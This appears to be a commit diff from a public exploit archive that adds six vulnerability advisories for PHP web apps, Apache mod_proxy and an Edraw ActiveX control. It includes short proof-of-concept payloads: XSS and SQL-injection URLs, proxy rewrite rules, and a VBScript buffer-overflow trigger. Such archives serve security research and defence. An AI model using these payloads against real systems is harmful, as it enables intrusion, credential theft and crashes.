DB: 2015-04-08
6 new exploits
This commit is contained in:
parent
c7a0ac44ed
commit
9a45389171
8 changed files with 63 additions and 1 deletions
|
@ -33063,3 +33063,9 @@ id,file,description,date,author,platform,type,port
|
|||
36655,platforms/php/webapps/36655.txt,"phpLDAPadmin 1.2.0.5-2 'server_id' Parameter Cross Site Scripting Vulnerabilities",2012-02-01,andsarmiento,php,webapps,0
|
||||
36656,platforms/php/webapps/36656.txt,"GForge 5.7.1 Multiple Cross Site Scripting Vulnerabilities",2012-02-02,sonyy,php,webapps,0
|
||||
36657,platforms/php/webapps/36657.txt,"Joomla! 'com_bnf' Component 'seccion_id' Parameter Remote SQL Injection Vulnerability",2012-02-02,"Daniel Godoy",php,webapps,0
|
||||
36658,platforms/php/webapps/36658.txt,"iknSupport 'search' Module Cross Site Scripting Vulnerability",2012-02-02,"Red Security TEAM",php,webapps,0
|
||||
36659,platforms/php/webapps/36659.txt,"Joomla! Currency Converter Component 'from' Parameter Cross-Site Scripting Vulnerability",2012-02-02,"BHG Security Center",php,webapps,0
|
||||
36660,platforms/php/webapps/36660.txt,"project-open 3.4.x 'account-closed.tcl' Cross Site Scripting Vulnerability",2012-02-03,"Michail Poultsakis",php,webapps,0
|
||||
36661,platforms/php/webapps/36661.txt,"PHP-Fusion 7.2.4 'weblink_id' Parameter SQL Injection Vulnerability",2012-02-03,Am!r,php,webapps,0
|
||||
36662,platforms/windows/dos/36662.txt,"Edraw Diagram Component 5 ActiveX Control 'LicenseName()' Method Buffer Overflow Vulnerability",2012-02-06,"Senator of Pirates",windows,dos,0
|
||||
36663,platforms/linux/remote/36663.txt,"Apache HTTP Server <= 2.2.15 'mod_proxy' Reverse Proxy Security Bypass Vulnerability",2012-02-06,"Tomas Hoger",linux,remote,0
|
||||
|
|
Can't render this file because it is too large.
|
8
platforms/linux/remote/36663.txt
Executable file
8
platforms/linux/remote/36663.txt
Executable file
|
@ -0,0 +1,8 @@
|
|||
source: http://www.securityfocus.com/bid/51869/info
|
||||
|
||||
Apache HTTP Server is prone to a security-bypass vulnerability.
|
||||
|
||||
Successful exploits will allow attackers to bypass certain security restrictions and obtain sensitive information about running web applications.
|
||||
|
||||
RewriteRule ^(.*) http://www.example.com$1
|
||||
ProxyPassMatch ^(.*) http://www.example.com$1
|
7
platforms/php/webapps/36658.txt
Executable file
7
platforms/php/webapps/36658.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/51803/info
|
||||
|
||||
iknSupport is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
http://www.example.com/module/kb/search_word/" onmouseover=alert(1) bad=/"/Submit/Search/task/search
|
7
platforms/php/webapps/36659.txt
Executable file
7
platforms/php/webapps/36659.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/51804/info
|
||||
|
||||
The Currency Converter component for Joomla! is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
http://www.example.com/path/modules/mod_currencyconverter/includes/convert.php?from=[XSS]
|
7
platforms/php/webapps/36660.txt
Executable file
7
platforms/php/webapps/36660.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/51842/info
|
||||
|
||||
project-open is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
http://www.example.com/register/account-closed?message=[arbitrary-JavaScript]
|
7
platforms/php/webapps/36661.txt
Executable file
7
platforms/php/webapps/36661.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/51865/info
|
||||
|
||||
PHP-Fusion is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/weblinks.php?weblink_id=[Sql]
|
20
platforms/windows/dos/36662.txt
Executable file
20
platforms/windows/dos/36662.txt
Executable file
|
@ -0,0 +1,20 @@
|
|||
source: http://www.securityfocus.com/bid/51866/info
|
||||
|
||||
Edraw Diagram Component ActiveX control ('EDBoard.ocx') is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
|
||||
|
||||
An attacker can exploit this issue to execute arbitrary code in the context of the application, usually Internet Explorer, using the ActiveX control. Failed attacks will likely cause denial-of-service conditions.
|
||||
|
||||
Edraw Diagram Component 5 is vulnerable; other versions may also be affected.
|
||||
|
||||
Author : Senator of Pirates
|
||||
This exploit tested on Windows Xp SP3 EN
|
||||
http://www.edrawsoft.com/download/EDBoardSetup.exe
|
||||
--------------------------------------------------------------------------------------------------------
|
||||
<object
|
||||
classid='clsid:6116A7EC-B914-4CCE-B186-66E0EE7067CF' id='target' /> <script language='vbscript'>targetFile = "C:\Program Files\edboard\EDBoard.ocx"
|
||||
prototype = "Invoke_Unknown LicenseName As String"
|
||||
memberName = "LicenseName"
|
||||
progid = "EDBoardLib.EDBoard"
|
||||
argCount = 1
|
||||
arg1=String(3092, "A")
|
||||
target.LicenseName = arg1</script>
|
|
@ -4,7 +4,7 @@
|
|||
#[+] Date: 27-03-2015
|
||||
#[+] Type: Local Exploits
|
||||
#[+] Tested on: WinXp/Windows 7 Pro
|
||||
#[+] Vendor: https://www.internetdownloadmanager.com/
|
||||
#[+] Vendor: http://www.internetdownloadmanager.com/
|
||||
#[+] Friendly Sites: sec4ever.com
|
||||
#[+] Twitter: @TCYB3R
|
||||
#[+] Poc:http://i.imgur.com/7et4xSh.png
|
||||
|
|
Loading…
Add table
Reference in a new issue